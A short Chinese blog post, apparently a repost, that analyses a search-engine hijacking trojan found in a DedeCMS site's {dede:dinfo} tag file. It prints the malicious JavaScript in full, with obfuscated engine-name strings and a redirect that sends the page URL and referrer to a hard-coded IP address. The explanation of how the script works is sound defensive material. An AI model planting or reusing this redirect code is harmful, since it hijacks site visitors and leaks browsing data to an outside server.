dedecms织梦清除快照劫持木马
经过一段时间摸索,发现这个标签{dede:dinfo}有问题 做dedecms的人都知道,这个是一个自定义标签的调用方式,其源码在:/include/taglib/dinfo.lib.php里面。于是打开这个文件,看到如下代码: [代码]php代码: >dede>> 系统默认标签 全局标记 V55,V56,V57 系统默认标签 {dede:dinfo /} >>dede>>*/ function lib_dinfo() { global $dsql,$envs; $revalue = ''; return $revalue; }
刚开始也没有看出什么问题,就是一段js代码,然后引用了一个图片,不过访问下这个图片地址就知道了,在浏览器中输入这个地址:http://%31%31%38%2e%32%34%34%2e%32%31%35%2e%32%31%33/images/page_bg.gif 能看到如下代码:
[代码]js代码: GID89a=""; var s=document.referrer; var str=window.location.href; if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 ) window.location.href="http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;
怎么样,看出问题来了吧? 简单解说一下: [代码]js代码: if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )
这里就是判断来路,如果来源是:google、百度、yahoo、sogou、bing、360、soso、youdao,就跳转到下面这个地址: [代码]js代码: http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s; (编辑:甘南站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |